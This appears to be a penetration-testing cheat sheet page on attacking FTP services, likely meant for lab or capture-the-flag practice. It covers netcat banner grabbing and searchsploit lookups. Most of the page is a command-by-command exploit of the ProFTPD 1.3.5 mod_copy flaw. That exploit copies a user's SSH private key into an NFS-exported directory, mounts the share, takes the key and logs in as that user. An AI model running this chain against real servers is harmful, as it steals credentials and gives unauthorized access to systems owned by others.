21 - ftp
Enumeration
Use netcat to banner grab FTP version
nc $IP 21
Use searchsploit to find exploits from exploit-db on FTP version
searchsploit ftp 1.2.3
Exploitation examples
ProFTPD 1.3.5 mod_copy
ProFTPD 1.3.5 has a vulnerability within mod_copy module, which allows to use SITE CPFR
and SITE CPTO
commands commands via netcat to copy files. Within this example we will chain this exploit to copy Bobo's SSH keys to a misconfigured NFS share, then mount the share on our attack machine allowing access to the SSH keys.
# Use netcat to copy the file into a NFS share(s)
nc $IP 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<IP>]
SITE CPFR /home/bob/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy sucessful
# Mount the nfs share and get bob's keys
mkdir nfs
sudo mount $IP:/var nfs
cp nfs/tmp/id_rsa id_rsa
sudo umount nfs
# Use SSH to log into a host
chmod 600 id_rsa
ssh -i id_rsa bob@$IP
Last updated
Was this helpful?